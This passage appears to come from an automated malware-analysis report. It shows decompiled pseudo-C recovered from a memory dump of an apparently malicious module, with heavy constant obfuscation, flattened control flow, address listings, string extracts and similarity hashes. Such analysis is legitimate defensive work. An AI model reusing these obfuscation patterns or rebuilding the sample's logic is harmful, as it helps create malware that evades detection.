				 *(_t522 + 0x60) =  *(_t522 + 0x60) + 0xd7d3;
				 *(_t522 + 0x60) =  *(_t522 + 0x60) ^ 0x6845fe36;
				 *(_t522 + 0x2c) = 0xb4cc5e;
				 *(_t522 + 0x2c) =  *(_t522 + 0x2c) << 0xf;
				 *(_t522 + 0x2c) =  *(_t522 + 0x2c) ^ 0x2d133405;
				 *(_t522 + 0x2c) =  *(_t522 + 0x2c) >> 5;
				 *(_t522 + 0x2c) =  *(_t522 + 0x2c) ^ 0x025eb22d;
				 *(_t522 + 0x24) = 0x246874;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) ^ 0x232c1123;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) + 0xffffd739;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) ^ 0xc1a651ac;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) ^ 0xe2aa2c94;
				 *(_t522 + 0x1c) = 0xb4e53c;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) << 9;
				_t511 = 0x2c;
				_t504 =  *(_t522 + 0x7c);
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) / _t511;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) >> 1;
				 *(_t522 + 0x1c) =  *(_t522 + 0x1c) ^ 0x0135db95;
				 *(_t522 + 0x84) = 0x1fbf7a;
				 *(_t522 + 0x84) =  *(_t522 + 0x84) << 0xb;
				 *(_t522 + 0x84) =  *(_t522 + 0x84) ^ 0xfdfbd0db;
				 *(_t522 + 0xb0) = 0x8ab1fb;
				_t512 = 0xa;
				_t264 = _t522 + 0x80; // 0x294b3653
				_t520 =  *_t264;
				 *(_t522 + 0xb4) =  *(_t522 + 0xb0) * 0x15;
				 *(_t522 + 0xb4) =  *(_t522 + 0xb4) ^ 0x0b61cfec;
				 *(_t522 + 0x78) = 0x86be0f;
				 *(_t522 + 0x78) =  *(_t522 + 0x78) ^ 0xef2765d4;
				 *(_t522 + 0x78) =  *(_t522 + 0x78) + 0xfffffa2d;
				 *(_t522 + 0x78) =  *(_t522 + 0x78) ^ 0xefa18f0c;
				 *(_t522 + 0x24) = 0x39b1d6;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) / _t512;
				_t513 = 0x44;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) * 0x61;
				_t289 = _t522 + 0x80; // 0x294b3653
				_t455 =  *_t289;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) / _t454;
				 *(_t522 + 0x24) =  *(_t522 + 0x24) ^ 0x0005cf2f;
				 *(_t522 + 0x58) = 0x9bc871;
				 *(_t522 + 0x58) =  *(_t522 + 0x58) << 9;
				 *(_t522 + 0x58) =  *(_t522 + 0x58) ^ 0xccf2d600;
				 *(_t522 + 0x58) =  *(_t522 + 0x58) ^ 0xfb6e9331;
				 *(_t522 + 0x7c) = 0x90db1b;
				 *(_t522 + 0x7c) =  *(_t522 + 0x7c) << 0x10;
				 *(_t522 + 0x7c) =  *(_t522 + 0x7c) / _t513;
				 *(_t522 + 0x7c) =  *(_t522 + 0x7c) ^ 0x033d5560;
				 *(_t522 + 0x40) = 0xb6788e;
				_t514 = 0x45;
				_push("true");
				 *(_t522 + 0x40) =  *(_t522 + 0x40) / _t514;
				 *(_t522 + 0x40) =  *(_t522 + 0x40) ^ 0xed9e7a2b;
				 *(_t522 + 0x40) =  *(_t522 + 0x40) >> 2;
				 *(_t522 + 0x40) =  *(_t522 + 0x40) ^ 0x3b6df138;
				 *(_t522 + 0x74) = 0x90228f;
				_pop(_t515);
				_t516 =  *(_t522 + 0x7c);
				 *(_t522 + 0x70) =  *(_t522 + 0x74) / _t515;
				 *(_t522 + 0x70) =  *(_t522 + 0x70) >> 6;
				 *(_t522 + 0x70) =  *(_t522 + 0x70) ^ 0x0001bb42;
				 *(_t522 + 0x98) = 0xecdcb2;
				 *(_t522 + 0x98) =  *(_t522 + 0x98) + 0xffff8542;
				 *(_t522 + 0x98) =  *(_t522 + 0x98) ^ 0x00e466e4;
				while(1) {
					L1:
					_t429 = 0x6a866ea;
					L2:
					while(_t457 != 0x201e5a0) {
						if(_t457 == 0x3e9584b) {
							_t390 = _t522 + 0x98; // 0xe466e4
							E100074B2( *(_t522 + 0x84),  *(_t522 + 0x48),  *(_t522 + 0x78), _t455,  *_t390);
						} else {
							if(_t457 == _t429) {
								_t437 = E10015E96( *(_t522 + 0x44),  *((intOrPtr*)(_t522 + 0xc0)), _t457, _t504, _t522 + 0xc8, _t455,  *(_t522 + 0x60), _t457, _t457,  *(_t522 + 0xb4),  *(_t522 + 0x60),  *(_t522 + 0xa0), _t516,  *(_t522 + 0x48),  *(_t522 + 0xac));
								_t522 = _t522 + 0x34;
								__eflags = _t437;
								if(_t437 == 0) {
									_t438 =  *(_t522 + 0xb4);
								} else {
									_t518 = _t504;
									while(1) {
										__eflags =  *((intOrPtr*)(_t518 + 4)) - 4;
										if( *((intOrPtr*)(_t518 + 4)) != 4) {
											goto L18;
										}
										L17:
										_t441 = E1000DB91( *(_t522 + 0xb0), _t518 + 0xc, _t520,  *(_t522 + 0x18),  *(_t522 + 0x60));
										_t522 = _t522 + 0xc;
										__eflags = _t441;
										if(_t441 == 0) {
											_t438 = 1;
											 *(_t522 + 0xb4) = 1;
										} else {
											goto L18;
										}
										L23:
										_t516 =  *(_t522 + 0x7c);
										goto L24;
										L18:
										_t440 =  *_t518;
										__eflags = _t440;
										if(_t440 == 0) {
											_t438 =  *(_t522 + 0xb4);
										} else {
											_t518 = _t518 + _t440;
											__eflags =  *((intOrPtr*)(_t518 + 4)) - 4;
											if( *((intOrPtr*)(_t518 + 4)) != 4) {
												goto L18;
											}
										}
										goto L23;
									}
								}
								L24:
								__eflags = _t438;
								if(__eflags == 0) {
									_t429 = 0x6a866ea;
									_t457 = 0x6a866ea;
									continue;
								} else {
									E100042EA( *((intOrPtr*)( *0x10025220 + 0x10)),  *(_t522 + 0x38),  *(_t522 + 0x2c),  *((intOrPtr*)(_t522 + 0x20)),  *(_t522 + 0x84));
									_t522 = _t522 + 0xc;
									_t457 = 0x8e6c94c;
									goto L1;
								}
								L32:
							} else {
								if(_t457 == 0x6d11531) {
									_t516 = 0x1000;
									_push(_t457);
									 *(_t522 + 0x88) = 0x1000;
									_t504 = E100134E7(_t457, 0x1000);
									_t522 = _t522 + 0xc;
									__eflags = _t504;
									_t429 = 0x6a866ea;
									_t457 =  !=  ? 0x6a866ea : 0x3e9584b;
									continue;
								} else {
									if(_t457 == 0x8e6c94c) {
										E100088FC( *((intOrPtr*)(_t522 + 0xbc)),  *(_t522 + 0x80),  *(_t522 + 0x28),  *(_t522 + 0x58), _t504);
										_t522 = _t522 + 0xc;
										_t457 = 0x3e9584b;
										while(1) {
											L1:
											_t429 = 0x6a866ea;
											goto L2;
										}
									} else {
										if(_t457 == 0xb0b5511) {
											_t452 = E1001CCFE(0x2000000,  *(_t522 + 0xac),  *((intOrPtr*)(_t522 + 0xcc)),  *(_t522 + 0x88),  *(_t522 + 0x68), 1,  *((intOrPtr*)(_t522 + 0x50)), _t522 + 0xd0,  *(_t522 + 0x5c),  *(_t522 + 0x24), _t457,  *(_t522 + 0x5c),  *(_t522 + 0x28) | 0x00000006);
											_t455 = _t452;
											_t522 = _t522 + 0x30;
											__eflags = _t452 - 0xffffffff;
											if(__eflags != 0) {
												_t457 = 0x6d11531;
												while(1) {
													L1:
													_t429 = 0x6a866ea;
													goto L2;
												}
											}
										} else {
											if(_t457 != 0xe349031) {
												L28:
												__eflags = _t457 - 0xe088776;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												_t457 = 0x201e5a0;
												continue;
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L32;
					}
					_t385 = _t522 + 0x98; // 0xe466e4
					E1001E780( *_t385, __eflags,  *((intOrPtr*)(_t522 + 0x8c)), _t522 + 0xc8);
					_t432 = E10001A5C(_t522 + 0xd4,  *(_t522 + 0x40),  *(_t522 + 0x70));
					_t520 = _t432;
					_t522 = _t522 + 0xc;
					__eflags = 0;
					_t457 = 0xb0b5511;
					 *((short*)(_t432 - 2)) = 0;
					_t429 = 0x6a866ea;
					goto L28;
				}
			}

0x1000addf
0x1000adec
0x1000adf5
0x1000ae00
0x1000ae05
0x1000ae13
0x1000ae24
0x1000ae29
0x1000ae30
0x1000ae3b
0x1000ae43
0x1000ae4b
0x1000ae56
0x1000ae5b
0x1000ae5f
0x1000ae67
0x1000ae72
0x1000ae7d
0x1000ae88
0x1000ae9d
0x1000aea0
0x1000aea1
0x1000aea8
0x1000aeb3
0x1000aec9
0x1000aed0
0x1000aedb
0x1000aee3
0x1000aeeb
0x1000aef3
0x1000aefb
0x1000af03
0x1000af13
0x1000af17
0x1000af1f
0x1000af27
0x1000af32
0x1000af3d
0x1000af48
0x1000af50
0x1000af58
0x1000af60
0x1000af68
0x1000af70
0x1000af78
0x1000af7d
0x1000af85
0x1000af93
0x1000af9c
0x1000afa0
0x1000afa8
0x1000afb0
0x1000afb8
0x1000afc0
0x1000afc5
0x1000afcd
0x1000afde
0x1000afe1
0x1000afe5
0x1000afed
0x1000aff5
0x1000affd
0x1000b00d
0x1000b011
0x1000b019
0x1000b021
0x1000b029
0x1000b02e
0x1000b036
0x1000b03e
0x1000b046
0x1000b04e
0x1000b053
0x1000b05b
0x1000b066
0x1000b06e
0x1000b079
0x1000b081
0x1000b089
0x1000b08e
0x1000b096
0x1000b09e
0x1000b0a6
0x1000b0ae
0x1000b0b6
0x1000b0be
0x1000b0c6
0x1000b0d1
0x1000b0dc
0x1000b0e7
0x1000b0ef
0x1000b0f7
0x1000b0ff
0x1000b112
0x1000b119
0x1000b124
0x1000b12c
0x1000b13c
0x1000b140
0x1000b148
0x1000b150
0x1000b158
0x1000b15d
0x1000b165
0x1000b170
0x1000b178
0x1000b183
0x1000b18e
0x1000b196
0x1000b1a1
0x1000b1a9
0x1000b1b2
0x1000b1b5
0x1000b1b9
0x1000b1c1
0x1000b1c9
0x1000b1d1
0x1000b1d6
0x1000b1de
0x1000b1e6
0x1000b1ee
0x1000b1f3
0x1000b1fb
0x1000b200
0x1000b20a
0x1000b212
0x1000b21a
0x1000b222
0x1000b22a
0x1000b232
0x1000b23a
0x1000b245
0x1000b24a
0x1000b24e
0x1000b252
0x1000b256
0x1000b25e
0x1000b269
0x1000b271
0x1000b27c
0x1000b291
0x1000b294
0x1000b294
0x1000b29b
0x1000b2a2
0x1000b2ad
0x1000b2b5
0x1000b2bd
0x1000b2c5
0x1000b2cd
0x1000b2dd
0x1000b2e6
0x1000b2e9
0x1000b2f5
0x1000b2f5
0x1000b2fc
0x1000b300
0x1000b308
0x1000b310
0x1000b315
0x1000b31d
0x1000b325
0x1000b32d
0x1000b33a
0x1000b33e
0x1000b346
0x1000b352
0x1000b355
0x1000b357
0x1000b35d
0x1000b365
0x1000b36a
0x1000b372
0x1000b37e
0x1000b381
0x1000b385
0x1000b389
0x1000b38e
0x1000b396
0x1000b3a1
0x1000b3ac
0x1000b3b7
0x1000b3b7
0x1000b3b7
0x00000000
0x1000b3bc
0x1000b3ce
0x1000b5f9
0x1000b610
0x1000b3d4
0x1000b3d6
0x1000b50c
0x1000b511
0x1000b514
0x1000b516
0x1000b555
0x1000b518
0x1000b518
0x1000b51a
0x1000b51a
0x1000b51e
0x00000000
0x00000000
0x1000b520
0x1000b533
0x1000b538
0x1000b53b
0x1000b53d
0x1000b54b
0x1000b54c
0x00000000
0x00000000
0x00000000
0x1000b565
0x1000b565
0x00000000
0x1000b53f
0x1000b53f
0x1000b541
0x1000b543
0x1000b55e
0x1000b545
0x1000b545
0x1000b51a
0x1000b51e
0x00000000
0x00000000
0x1000b51e
0x00000000
0x1000b543
0x1000b51a
0x1000b569
0x1000b569
0x1000b56b
0x1000b59b
0x1000b5a0
0x00000000
0x1000b56d
0x1000b589
0x1000b58e
0x1000b591
0x00000000
0x1000b591
0x00000000
0x1000b3dc
0x1000b3e2
0x1000b496
0x1000b4aa
0x1000b4ad
0x1000b4b9
0x1000b4bb
0x1000b4be
0x1000b4c5
0x1000b4ca
0x00000000
0x1000b3e8
0x1000b3ee
0x1000b480
0x1000b485
0x1000b488
0x1000b3b7
0x1000b3b7
0x1000b3b7
0x00000000
0x1000b3b7
0x1000b3f0
0x1000b3f6
0x1000b44c
0x1000b451
0x1000b453
0x1000b456
0x1000b459
0x1000b45f
0x1000b3b7
0x1000b3b7
0x1000b3b7
0x00000000
0x1000b3b7
0x1000b3b7
0x1000b3f8
0x1000b3fe
0x1000b5eb
0x1000b5eb
0x1000b5f1
0x00000000
0x00000000
0x1000b5f7
0x1000b404
0x1000b404
0x00000000
0x1000b404
0x1000b3fe
0x1000b3f6
0x1000b3ee
0x1000b3e2
0x1000b3d6
0x1000b61b
0x1000b624
0x00000000
0x1000b624
0x1000b5b6
0x1000b5bd
0x1000b5d1
0x1000b5d6
0x1000b5d8
0x1000b5db
0x1000b5dd
0x1000b5e2
0x1000b5e6
0x00000000
0x1000b5e6

Strings

+Me, xrefs: 1000B1A1
th$, xrefs: 1000B20A
`{\, xrefs: 1000AE5F
mk@, xrefs: 1000B0FF
f, xrefs: 1000B5B6
S6K), xrefs: 1000B294

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: +Me$S6K)$`{\$mk@$th$$f
API String ID: 0-3990729276
Opcode ID: 488650ee30152b561cd1af8bafe8e0b1cf4ba04fdc2ebc80a7ab8c548596d2c6
Instruction ID: 93bc96e1a709fa2a165c6bc46973f54865a5ffc8ee96587a567fe4ba7e510011
Opcode Fuzzy Hash: 488650ee30152b561cd1af8bafe8e0b1cf4ba04fdc2ebc80a7ab8c548596d2c6
Instruction Fuzzy Hash: 53121371509780CFD368CF25C989A4BFBE2FBC4798F10891DE69A96260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10007E3E, Relevance: 7.9, Strings: 6, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E10007E3E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v256;
				char _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				intOrPtr* _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				void* _t385;
				void* _t389;
				intOrPtr _t394;
				void* _t408;
				void* _t411;
				intOrPtr _t414;
				void* _t416;
				intOrPtr _t417;
				intOrPtr _t420;
				intOrPtr _t427;
				intOrPtr _t456;
				intOrPtr _t462;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t466;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t470;
				intOrPtr _t471;
				intOrPtr _t472;
				signed int* _t474;
				void* _t478;

				_push(_a20);
				_t472 = __edx;
				_push(_a16);
				_v284 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100167B8(__ecx);
				_v380 = 0x38010d;
				_t474 =  &(( &_v424)[7]);
				_t417 = 0;
				_t420 = 0xf80dace;
				_t463 = 0x53;
				_v380 = _v380 / _t463;
				_v380 = _v380 << 0x10;
				_v380 = _v380 ^ 0xacb70e08;
				_v296 = 0x608c9e;
				_t464 = 0x16;
				_v296 = _v296 * 0x42;
				_v296 = _v296 ^ 0x18e528b0;
				_v356 = 0xa58af9;
				_v356 = _v356 / _t464;
				_v356 = _v356 >> 3;
				_v356 = _v356 ^ 0x0006e97f;
				_v332 = 0xa56263;
				_t465 = 0x78;
				_v332 = _v332 * 0x6f;
				_v332 = _v332 >> 2;
				_v332 = _v332 ^ 0x11ef4cce;
				_v368 = 0xb9dda9;
				_v368 = _v368 + 0xffff0c19;
				_v368 = _v368 ^ 0x09a05b93;
				_v368 = _v368 ^ 0x09192c23;
				_v392 = 0x9ddec3;
				_v392 = _v392 | 0x21fd6b1d;
				_v392 = _v392 + 0xffff62f8;
				_v392 = _v392 ^ 0x21fe6e11;
				_v340 = 0xf24da4;
				_v340 = _v340 + 0xffffd8b0;
				_v340 = _v340 * 0x72;
				_v340 = _v340 ^ 0x6bdf7b16;
				_v324 = 0x436a97;
				_v324 = _v324 + 0x2f01;
				_v324 = _v324 ^ 0x004d7e0e;
				_v300 = 0xa8f16c;
				_v300 = _v300 | 0x5e619f7c;
				_v300 = _v300 ^ 0x5ee11e21;
				_v400 = 0xeea8;
				_v400 = _v400 + 0x7095;
				_v400 = _v400 / _t465;
				_v400 = _v400 << 0xf;
				_v400 = _v400 ^ 0x017fa01c;
				_v364 = 0x68818;
				_v364 = _v364 << 7;
				_v364 = _v364 + 0xffffeba6;
				_v364 = _v364 ^ 0x03487d1d;
				_v312 = 0xbeb7ce;
				_v312 = _v312 << 4;
				_v312 = _v312 ^ 0x0bed15ba;
				_v408 = 0x8913c1;
				_v408 = _v408 | 0x5834d451;
				_v408 = _v408 >> 1;
				_v408 = _v408 ^ 0xbb0edf4a;
				_v408 = _v408 ^ 0x975d891e;
				_v348 = 0x9dca0b;
				_v348 = _v348 | 0x8fea0c57;
				_t466 = 0x23;
				_v348 = _v348 * 0xd;
				_v348 = _v348 ^ 0x4ffeecb3;
				_v372 = 0x7e648f;
				_v372 = _v372 ^ 0x7019b51b;
				_v372 = _v372 | 0xbc967cbc;
				_v372 = _v372 ^ 0xfcf59de6;
				_v288 = 0x2ab099;
				_v288 = _v288 ^ 0x7516c1eb;
				_v288 = _v288 ^ 0x75371a58;
				_v404 = 0x91eadd;
				_v404 = _v404 + 0x189f;
				_v404 = _v404 | 0xafd3f853;
				_v404 = _v404 + 0xffffeae3;
				_v404 = _v404 ^ 0xafdef98a;
				_v376 = 0xb62c31;
				_v376 = _v376 ^ 0x4dcb0855;
				_v376 = _v376 + 0x3a29;
				_v376 = _v376 ^ 0x4d7af5b4;
				_v304 = 0x15ea19;
				_v304 = _v304 + 0x9a7e;
				_v304 = _v304 ^ 0x001d04fb;
				_v412 = 0x6f2c85;
				_v412 = _v412 ^ 0x83ce5e22;
				_v412 = _v412 * 0x74;
				_v412 = _v412 << 0xd;
				_v412 = _v412 ^ 0xfe7147ba;
				_v420 = 0x58645c;
				_v420 = _v420 + 0x7aa4;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 + 0xffff6b2d;
				_v420 = _v420 ^ 0xfff29ca7;
				_v424 = 0x510b97;
				_v424 = _v424 / _t466;
				_v424 = _v424 << 9;
				_v424 = _v424 ^ 0x79a24977;
				_v424 = _v424 ^ 0x7d0add13;
				_v292 = 0xdfae4d;
				_t467 = 0x46;
				_v292 = _v292 * 0x7d;
				_v292 = _v292 ^ 0x6d3d36ad;
				_v360 = 0x499875;
				_v360 = _v360 + 0x39f7;
				_v360 = _v360 / _t467;
				_v360 = _v360 ^ 0x0000d8db;
				_v396 = 0xdc5365;
				_v396 = _v396 ^ 0xe3c0f642;
				_v396 = _v396 | 0x5c784bfe;
				_v396 = _v396 >> 6;
				_v396 = _v396 ^ 0x03f442f5;
				_v384 = 0x28089d;
				_t468 = 0x5f;
				_v384 = _v384 / _t468;
				_v384 = _v384 + 0x3524;
				_v384 = _v384 ^ 0x00098b9d;
				_v336 = 0x1fe742;
				_v336 = _v336 + 0x7b21;
				_v336 = _v336 + 0xffffa9cb;
				_v336 = _v336 ^ 0x00235e7a;
				_v320 = 0x519455;
				_v320 = _v320 | 0xcc7b0060;
				_v320 = _v320 ^ 0xcc749142;
				_v344 = 0x1a2a11;
				_v344 = _v344 ^ 0xb4013916;
				_t469 = 0x32;
				_t462 = _v284;
				_v344 = _v344 * 0x72;
				_v344 = _v344 ^ 0x340db0f7;
				_v352 = 0x2026f5;
				_v352 = _v352 / _t469;
				_t470 = 0x7c;
				_t471 = _v284;
				_v352 = _v352 / _t470;
				_v352 = _v352 ^ 0x000e84df;
				_v328 = 0x2cb815;
				_v328 = _v328 + 0x4db9;
				_v328 = _v328 + 0xc459;
				_v328 = _v328 ^ 0x00264869;
				_v388 = 0x5e85f5;
				_v388 = _v388 >> 4;
				_v388 = _v388 >> 0xf;
				_v388 = _v388 + 0xffff32dc;
				_v388 = _v388 ^ 0xfff466f9;
				_v308 = 0x459fba;
				_v308 = _v308 ^ 0x4a0d9aac;
				_v308 = _v308 ^ 0x4a48c58d;
				_v316 = 0x6483e4;
				_v316 = _v316 >> 5;
				_v316 = _v316 ^ 0x000702f6;
				_v416 = 0x550142;
				_v416 = _v416 * 0x3b;
				_v416 = _v416 ^ 0x5c905cb5;
				_v416 = _v416 * 0x1e;
				_v416 = _v416 ^ 0x42d4a75a;
				while(1) {
					L1:
					_t385 = 0x2213ac8;
					do {
						while(1) {
							L2:
							_t478 = _t420 - 0x5cb1332;
							if(_t478 > 0) {
								break;
							}
							if(_t478 == 0) {
								_t427 =  *0x10025214;
								_t394 =  *((intOrPtr*)( *((intOrPtr*)(_t427 + 0x14)) + 0x38));
								 *((intOrPtr*)(_t427 + 0x18)) =  *((intOrPtr*)(_t427 + 0x18)) + 1;
								_t456 =  *((intOrPtr*)(_t427 + 0x18));
								 *((intOrPtr*)(_t427 + 0x14)) = _t394;
								if(_t394 == 0) {
									 *((intOrPtr*)(_t427 + 0x14)) =  *((intOrPtr*)(_t427 + 4));
								}
								if(_t456 >=  *((intOrPtr*)( *0x10025214 + 0x38))) {
									 *( *0x10025214 + 0x18) =  *( *0x10025214 + 0x18) & 0x00000000;
								} else {
									_t420 = 0xf80dace;
									while(1) {
										L1:
										_t385 = 0x2213ac8;
										goto L2;
									}
								}
							} else {
								if(_t420 == 0x15e8b33) {
									_t408 = E10012378( *( *((intOrPtr*)( *0x10025214 + 0x14)) + 0x44) & 0x0000ffff, _v364,  &_v272,  &_v264, _v312, _v408,  *((intOrPtr*)( *0x10025214 + 0x14)) + 0x14, _v348,  &_v256, _v372,  *( *((intOrPtr*)( *0x10025214 + 0x14)) + 0x64) & 0x0000ffff, _t471);
									_t474 =  &(_t474[0xa]);
									if(_t408 == 0) {
										_t462 = 0x5cb1332;
										L18:
										_t420 = 0x9ecdf94;
										while(1) {
											L1:
											_t385 = 0x2213ac8;
											goto L2;
										}
									} else {
										_t420 = 0xa90508b;
										while(1) {
											L1:
											_t385 = 0x2213ac8;
											goto L2;
										}
									}
								} else {
									if(_t420 == _t385) {
										_t411 = E10017E33(0x40, 1);
										_push(0xb);
										_push(_t411);
										_push(_v400);
										E10010204(_v300,  &_v256);
										_t474 =  &(_t474[5]);
										_t420 = 0x15e8b33;
										while(1) {
											L1:
											_t385 = 0x2213ac8;
											goto L2;
										}
									} else {
										if(_t420 == 0x4528801) {
											if(_v276 >= _v416) {
												_t414 = E1001514C( &_v280,  &_v272);
											} else {
												_t414 = E10001EE2( &_v280);
											}
											_t471 = _t414;
											_t385 = 0x2213ac8;
											_t420 =  !=  ? 0x2213ac8 : 0x9ecdf94;
											continue;
										} else {
											if(_t420 != 0x491498e) {
												goto L34;
											} else {
												_t416 = E10021033(_t472, _v284, _v368,  &_v280, _v392);
												_t474 =  &(_t474[3]);
												if(_t416 != 0) {
													_t420 = 0x4528801;
													while(1) {
														L1:
														_t385 = 0x2213ac8;
														goto L2;
													}
												}
											}
										}
									}
								}
							}
							L37:
							return _t417;
						}
						if(_t420 == 0x9ecdf94) {
							E100088FC(_v292, _v360, _v396, _v384, _v280);
							E100088FC(_v336, _v320, _v344, _v352, _t471);
							E100088FC(_v328, _v388, _v308, _v316, _v272);
							_t474 =  &(_t474[9]);
							_t420 = _t462;
							_t385 = 0x2213ac8;
							goto L34;
						} else {
							if(_t420 == 0xa90508b) {
								_t389 = E1000CD42( &_v264, _v288, _v404, _a4, _v376);
								_t474 =  &(_t474[3]);
								if(_t389 == 0) {
									_t462 = 0x5cb1332;
								} else {
									_t462 = 0x2381f31;
									_t417 = 1;
								}
								_t420 = 0xbe66574;
								goto L1;
							} else {
								if(_t420 == 0xbe66574) {
									E100088FC(_v304, _v412, _v420, _v424, _v264);
									_t474 =  &(_t474[3]);
									goto L18;
								} else {
									if(_t420 != 0xf80dace) {
										goto L34;
									} else {
										_t471 = 0;
										E1001A5E3(_v380,  &_v256, _v296, _v356, 0x100, _v332);
										_v272 = _v272 & 0;
										_t474 =  &(_t474[4]);
										_v268 = _v268 & 0;
										_t420 = 0x491498e;
										_v280 = _v280 & 0;
										_v276 = _v276 & 0;
										while(1) {
											L1:
											_t385 = 0x2213ac8;
											goto L2;
										}
									}
								}
							}
						}
						goto L37;
						L34:
					} while (_t420 != 0x2381f31);
					goto L37;
				}
			}

0x10007e48
0x10007e4f
0x10007e53
0x10007e5a
0x10007e61
0x10007e68
0x10007e6f
0x10007e76
0x10007e77
0x10007e78
0x10007e7d
0x10007e85
0x10007e8e
0x10007e90
0x10007e97
0x10007e9c
0x10007ea2
0x10007ea7
0x10007eaf
0x10007ec2
0x10007ec5
0x10007ecc
0x10007ed7
0x10007ee7
0x10007eeb
0x10007ef0
0x10007ef8
0x10007f05
0x10007f06
0x10007f0a
0x10007f0f
0x10007f17
0x10007f1f
0x10007f27
0x10007f2f
0x10007f37
0x10007f3f
0x10007f47
0x10007f4f
0x10007f57
0x10007f5f
0x10007f6c
0x10007f70
0x10007f78
0x10007f80
0x10007f88
0x10007f90
0x10007f9b
0x10007fa6
0x10007fb1
0x10007fb9
0x10007fc7
0x10007fcb
0x10007fd0
0x10007fd8
0x10007fe0
0x10007fe5
0x10007fed
0x10007ff5
0x10008000
0x10008008
0x10008013
0x1000801d
0x10008025
0x10008029
0x10008031
0x10008039
0x10008041
0x10008050
0x10008053
0x10008057
0x1000805f
0x10008067
0x1000806f
0x10008077
0x1000807f
0x1000808a
0x10008095
0x100080a0
0x100080a8
0x100080b0
0x100080b8
0x100080c0
0x100080c8
0x100080d0
0x100080d8
0x100080e0
0x100080e8
0x100080f3
0x100080fe
0x10008109
0x10008111
0x1000811e
0x10008122
0x10008127
0x1000812f
0x10008137
0x1000813f
0x10008144
0x1000814c
0x10008154
0x10008164
0x10008168
0x1000816d
0x10008175
0x1000817d
0x10008190
0x10008193
0x1000819a
0x100081a5
0x100081ad
0x100081bd
0x100081c1
0x100081c9
0x100081d1
0x100081d9
0x100081e1
0x100081e6
0x100081ee
0x100081fa
0x100081fd
0x10008201
0x10008209
0x10008211
0x10008219
0x10008221
0x10008229
0x10008231
0x1000823b
0x10008243
0x1000824b
0x10008253
0x10008262
0x10008265
0x1000826c
0x10008270
0x10008278
0x10008288
0x10008290
0x10008293
0x1000829a
0x1000829e
0x100082a6
0x100082ae
0x100082b6
0x100082be
0x100082c6
0x100082ce
0x100082d3
0x100082d8
0x100082e0
0x100082e8
0x100082f3
0x100082fe
0x10008309
0x10008311
0x10008316
0x1000831e
0x1000832b
0x1000832f
0x1000833c
0x10008340
0x10008348
0x10008348
0x10008348
0x1000834d
0x1000834d
0x1000834d
0x1000834d
0x10008353
0x00000000
0x00000000
0x10008359
0x100084a6
0x100084af
0x100084b2
0x100084b5
0x100084b8
0x100084bd
0x100084c2
0x100084c2
0x100084cd
0x1000863f
0x100084d3
0x100084d3
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x10008348
0x1000835f
0x10008365
0x10008481
0x10008486
0x1000848b
0x10008497
0x1000849c
0x1000849c
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x1000848d
0x1000848d
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x10008348
0x1000836b
0x1000836d
0x10008400
0x10008405
0x10008407
0x10008408
0x1000841a
0x1000841f
0x10008422
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x10008373
0x10008379
0x100083c9
0x100083d9
0x100083cb
0x100083cb
0x100083cb
0x100083de
0x100083e7
0x100083ec
0x00000000
0x1000837b
0x10008381
0x00000000
0x10008387
0x100083a0
0x100083a5
0x100083aa
0x100083b0
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x10008348
0x100083aa
0x10008381
0x10008379
0x1000836d
0x10008365
0x10008646
0x1000864f
0x1000864f
0x100084e3
0x100085db
0x100085f7
0x1000861c
0x10008621
0x10008624
0x10008626
0x00000000
0x100084e9
0x100084ef
0x1000859c
0x100085a1
0x100085a6
0x100085b2
0x100085a8
0x100085aa
0x100085af
0x100085af
0x100085b7
0x00000000
0x100084f5
0x100084fb
0x10008572
0x10008577
0x00000000
0x100084fd
0x10008503
0x00000000
0x10008509
0x10008514
0x1000852a
0x1000852f
0x10008536
0x10008539
0x10008540
0x10008545
0x1000854c
0x10008348
0x10008348
0x10008348
0x00000000
0x10008348
0x10008348
0x10008503
0x100084fb
0x100084ef
0x00000000
0x1000862b
0x1000862b
0x00000000
0x10008637

Strings

iH&, xrefs: 100082BE
z^#, xrefs: 10008229
`, xrefs: 1000823B
):, xrefs: 100080D8
$5, xrefs: 10008201
\dX, xrefs: 1000812F

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: $5$):$\dX$`$iH&$z^#
API String ID: 0-877221934
